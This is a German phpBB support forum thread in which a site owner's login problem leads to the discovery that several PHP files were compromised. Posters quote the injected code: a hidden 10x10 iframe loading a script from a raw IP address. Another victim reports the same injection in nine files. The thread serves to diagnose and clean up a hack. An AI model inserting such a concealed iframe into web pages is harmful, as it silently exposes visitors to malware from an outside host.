Als Admin ,kann ich nicht einlogen

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
petitprince
Mitglied

Als Admin ,kann ich nicht einlogen

Beitrag von petitprince »

Ich besitze seit einem Jahr eine website und ein Forum,Jetz habe ich ein Problem und zwar:
Bei der Website ist alles in ordnung aber als admin kann ich nich in Forum einlogen.Wenn ich zugriffdaten(User und Pass) eingebe,die sind akzeptiert und ich bekomme eine postive Antwort dass ich eingelogt bin. aber dann kann ich gar nicht tun,und ich werde automatisch ausgelogt.
Jetzrt steht ganz oben this Fehlermeldung :roll: .kann jemand bitte mir erklären was für Fehler habe ich.Ich brauche Hilfe,ich bedanke mich für die Antwort,

[ externes Bild ]
Crizzo
Administrator
Administrator
Re: Als Admin ,kann ich nicht einlogen

Beitrag von Crizzo »

Versuchs mal damit: KBL:headers_already_sent
petitprince
Mitglied

BlackHawk87 hat geschrieben:Versuchs mal damit: KBL:headers_already_sent
Ich bedanke mich seht ,Ich warte auf meinem Sohn,er wird das tun und dann ich sag es dir Bescheid-
petitprince
Mitglied

Vielen Dank, es funktioniert jetzt wieder, das einzig komische ist, dass am Ende von einigen Files folgender Code steht:

Code: Alles auswählen

<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=6b1ea494566d2b3cbc88513d1a28eae9&hashpage=c7eb3092ba2af511e108dd6336e8ccc7" width=10 border=1 height=10 style="visibility:hidden"></iframe>
Sieht ganz nach einem Fremdeingriff aus oder täusche ich mich da?
Crizzo
Administrator
Administrator

Beitrag von Crizzo »

Ka, was ist. Gehört afaik nicht zu phpBB. Mach mal Backups und lösch es mal raus. Wenn es danach ohne geht, ist es schon okay. :D
Mahony
Ehemaliges Teammitglied

Beitrag von Mahony »

Hallo
Suche mal in einer Suchmaschine deiner Wahl nach <iframe src="http://80.91.191.158/stats - dann weißt du, woran du bist.

Siehe dazu auch KB:gehackt

Grüße: Mahony
Taekwondo in Berlin
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
Waldläufer

Beitrag von Waldläufer »

Nur mal eine Frage so nebenbei....
Habt ihr irgendwelche PHP Scripte von Scar4U heruntergeladen bzw. auf eurer Homepage laufen?
Webkatalog & Webverzeichnis, Online Formular Verwaltung, Formmailer, Passwortschutz, Gästebuch, Online Umfrage Tool, Banner Rotation ,Counter ,News Verwaltung oder ähnliches?

Meine HP ist auch bei Google als "potenzieller Virenverbreiter" gemeldet und gesperrt. Ich habe mir alle Dateien auf meinen Rechner heruntergeladen und einen Scanner drüber laufen lassen. Es wurden insgesammt 9 Dateien infiziert. Ich habe mir mal eine herausgepickt und angesehen. Bei allen ist die komplette Datei umgeschrieben und die bekannte Zeile eingefügt: ?><iframe src="http://80.91.191.158/stats/priemIframe. ... eab8d18706" width=10 border=1 height=10 style="visibility:hidden"></iframe>

Weiter oben in dem Text taucht auch überall die nette Domain "Scar4U" auf.

Hab diese Jungs auch schon angeschrieben, aber es kommt keine Rückmeldung von denen.
Ich hab seit Ende Januar den Downloadzähler "ScarClick" von denen in Betrieb.

Wäre sehr gespannt ob euch dass selbe Wiederfahren ist und ob Scar4U der Urheber allen Übels ist.
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“